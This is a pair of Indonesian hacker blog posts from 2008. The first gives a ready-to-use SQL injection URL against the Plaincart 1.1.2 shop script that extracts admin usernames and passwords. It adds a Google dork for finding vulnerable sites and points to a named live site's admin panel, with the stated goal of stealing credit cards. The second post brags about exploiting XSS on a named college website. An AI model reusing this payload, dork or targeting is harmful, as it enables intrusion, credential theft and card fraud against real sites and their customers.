Bugs On Plaincart 1.1.2

Saturday, September 20, 2008

Hari Minggu kelabu buat bad.. tanpa kehadiran seorang wanita disisi, membuat hidup ini hampa terasa (jomblo set On ^_^) sambil mencari Paypal buat beli buku yg di jual mas Th0R wkwkwkwk... Bad membuka Milworm untuk melihat bugs2 terbaru...
Yep.. bad coba salah satu bugs yang ada di sana secara webshop gitu... yg ada di pikiran bad adalah rampok semua CC (dibaca: Credit Card) :p

Postingan kali ini di tujukan buat tmn2 yg masih newbie (including me) yg masih awam dlm hacking - menghacking.. halah... Wkwkwkwkwk....
langsung aja yah :

Exploit :

http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--

Admin Panel :
http://www.site.com/plaincart/admin/login.php
Author :
r45c4l
Dork :
inurl:"/plaincart/index.php"
(or you can use ur imagination to make your own google dork :) )

here's for example



Yep.. seperti yang udah bad jelaskan di gambar...

trz panel admin berada di bad, sabar donkz.. khn udah bad jelaskan di atas...

http://enoslim.com/plaincart/admin/login.php

huehueheuhe...

nih contoh yang lain, tp decript sendiri yah passwordnya :P




Best Regards,
BadKiddies





STIE YKPN Got XSS

Friday, September 19, 2008

Lewat postingan ini bad minta maaf kepada Dosen Bad yg berinisial "SS" gara2 mo ngutik2 webnya UAJY.. kekekekekeke.... ga ada mksd apa2 koq Pak, Bad bukan ingin mengotori rmh sendiri tp bad pgn ikut melindungi situs UAJY krn secara ga langsung khn bad ikut memperhatikan securitynya... huehuehuehuehue.....
ehmm buat gantinya bad testing di kampuz tetangga deh...
here we go...!!




Yep.. kampuz tetangga msh lemah tingkat securitynya...
bahkan ketika bad melakukan penetrasi lebih jauh, msh bnyk yang bs di lakukan attacker terhadap web STIE YKPN tersebut... hehehehehe....




Best Regards,
BadKiddies